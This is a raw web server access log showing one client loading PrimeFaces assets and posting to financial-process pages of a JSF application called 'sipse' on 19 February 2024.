161.10.179.183 - - [19/Feb/2024:05:57:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:57:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:57:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:57:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:57:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:57:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:57:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:08 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/expedirExperienciaIdoneidad.xhtml HTTP/1.1" 200 181245
161.10.179.183 - - [19/Feb/2024:05:58:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 77871
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 39509
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:58:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
